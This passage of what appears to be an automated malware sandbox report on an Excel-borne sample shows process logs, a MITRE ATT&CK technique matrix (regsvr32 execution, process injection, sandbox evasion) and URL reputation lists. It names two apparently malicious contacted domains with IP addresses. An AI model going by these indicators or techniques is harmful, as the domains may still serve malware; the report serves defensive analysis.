Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 1104Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: regsvr32.exe, 00000006.00000002.694387366.00000000005E0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: regsvr32.exe, 00000006.00000002.694387366.00000000005E0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: regsvr32.exe, 00000006.00000002.694387366.00000000005E0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: regsvr32.exe, 00000006.00000002.694387366.00000000005E0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting11DLL Side-Loading1Process Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion1Security Account ManagerApplication Window Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting11LSA SecretsSystem Information Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonRegsvr321Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
theottomandoner.com2%VirustotalBrowse
senderoalcielo.com1%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%VirustotalBrowse
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe
https://staging.cortana.ai0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
theottomandoner.com
5.100.155.169
truefalseunknown
senderoalcielo.com
108.167.165.249
truefalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.comFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
    high
    https://login.microsoftonline.com/FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
      high
      https://shell.suite.office.com:1443FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
          high
          https://autodiscover-s.outlook.com/FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
              high
              https://cdn.entity.FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/queryFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkeyFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                    high
                    https://powerlift.acompli.netFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.comFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v1FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                      high
                      https://cortana.aiFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspxFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.comFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                high
                                https://api.aadrm.com/FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=ImmersiveFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                      high
                                      https://cr.office.comFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControlFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                          high
                                          https://graph.ppe.windows.netFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                            high
                                            https://res.getmicrosoftkey.com/api/redemptioneventsFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://powerlift-frontdesk.acompli.netFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://tasks.office.comFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                              high
                                              https://officeci.azurewebsites.net/api/FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://sr.outlook.office.net/ws/speech/recognize/assistant/workFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                high
                                                https://store.office.cn/addinstemplateFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://outlook.office.com/autosuggest/api/v1/init?cvid=FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                  high
                                                  https://globaldisco.crm.dynamics.comFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                    high
                                                    https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                      high
                                                      https://store.officeppe.com/addinstemplateFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://dev0-api.acompli.net/autodetectFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://www.odwebp.svc.msFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://api.powerbi.com/v1.0/myorg/groupsFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                        high
                                                        https://web.microsoftstream.com/video/FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                          high
                                                          https://graph.windows.netFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                            high
                                                            https://dataservice.o365filtering.com/FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://officesetup.getmicrosoftkey.comFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://analysis.windows.net/powerbi/apiFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                              high
                                                              https://prod-global-autodetect.acompli.net/autodetectFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://outlook.office365.com/autodiscover/autodiscover.jsonFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                high
                                                                https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                  high
                                                                  https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                    high
                                                                    https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                      high
                                                                      https://ncus.contentsync.FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                        high
                                                                        https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                          high
                                                                          http://weather.service.msn.com/data.aspxFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                            high
                                                                            https://apis.live.net/v5.0/FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                              high
                                                                              https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                high
                                                                                https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                  high
                                                                                  https://management.azure.comFF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                    high
                                                                                    https://wus2.contentsync.FF586352-751C-4478-9E87-FF9CF397D4DE.0.drfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
